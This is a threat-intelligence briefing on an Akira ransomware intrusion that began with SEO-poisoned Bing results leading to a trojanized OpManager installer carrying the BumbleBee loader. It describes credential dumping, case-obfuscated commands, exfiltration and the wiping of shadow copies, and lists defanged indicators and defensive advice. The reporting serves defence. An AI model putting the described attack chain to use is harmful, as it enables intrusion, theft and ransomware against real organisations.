Security teams have a fresh reason to distrust the top hit in a search engine. The DFIR Report has detailed an intrusion that started with a poisoned Bing search for a popular IT tool and ended, less than two days later, with Akira ransomware encrypting an entire Windows domain.
The case is a clean example of how cybercriminals now buy their way onto trusted-looking download pages and turn a single mistaken click into a full network compromise.
From a search result to a trojanized installer
A user searching Bing for "ManageEngine OpManager," a common network-monitoring suite, was steered to opmanager[.]pro, a high-fidelity lookalike of the real download page. That site funneled them to download-center[.]online, which served a booby-trapped MSI installer instead of the genuine software. An IT administrator later ran the file from an internal share, and the BumbleBee loader executed by side-loading a malicious msimg32.dll.
The DFIR Report, working with Swisscom B2B CSIRT, ties the activity to a broader BumbleBee "SEO poisoning" campaign first flagged by researchers at Cyjax in May 2025. The operators ran a two-tier setup: convincing fake download sites such as opmanager[.]pro and zenmap[.]pro out front, and backend gateways that used a single URL parameter to dynamically serve trojanized installers for many different enterprise tools.
How the attack unfolded
About five hours after the first infection, the attacker dropped an AdaptixC2 beacon, hidden inside a renamed copy of a legitimate Windows utility, to hold a persistent command channel. From there they created new domain accounts with Enterprise Admin rights, installed RustDesk as a service for remote access, and pivoted over RDP to a domain controller and a backup server.
Credential theft was extensive. They extracted the NTDS.dit Active Directory database (the file that holds every domain user's password hash), dumped LSASS memory with the lsassy tool, and decrypted stored Veeam backup credentials via Windows DPAPI. The crew tunneled RDP over a reverse SSH connection to evade firewall rules and used mixed-case commands like pOWerShELl.exE to slip past simple detections. More than 75GB of files, credentials and domain configuration data were siphoned out through FileZilla to a server in Ukraine.
Roughly 44 hours after that first click, the attacker deployed Akira (staged as locker.exe), using WMI to wipe Volume Shadow Copies before encrypting the root domain, then returned two days later to encrypt a child domain as well. The same focus on Veeam credentials and backups has surfaced in earlier Akira cases documented by Sophos.
What you should do
Treat search-driven software downloads as a real initial-access vector: pull admin tools only from vendor domains you type yourself, and consider blocking newly registered lookalike domains. Watch for unexpected RustDesk or AdaptixC2 activity, brand-new Enterprise Admin accounts, netsh or wbadmin touching NTDS.dit, and reverse SSH tunnels. Keep at least one backup copy offline and immutable, because this playbook goes straight for Veeam and shadow copies.
Indicators
Lookalike and delivery domains: opmanager[.]pro, zenmap[.]pro and download-center[.]online. Attacker infrastructure observed across the intrusions: 84[.]32[.]84[.]32, 4[.]239[.]95[.]1 and 170[.]130[.]55[.]223. Public sandbox analyses are available at hxxps://tria[.]ge/250530-ttmjhayzhw and hxxps://tria[.]ge/250812-zw4tfszpy4.
This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.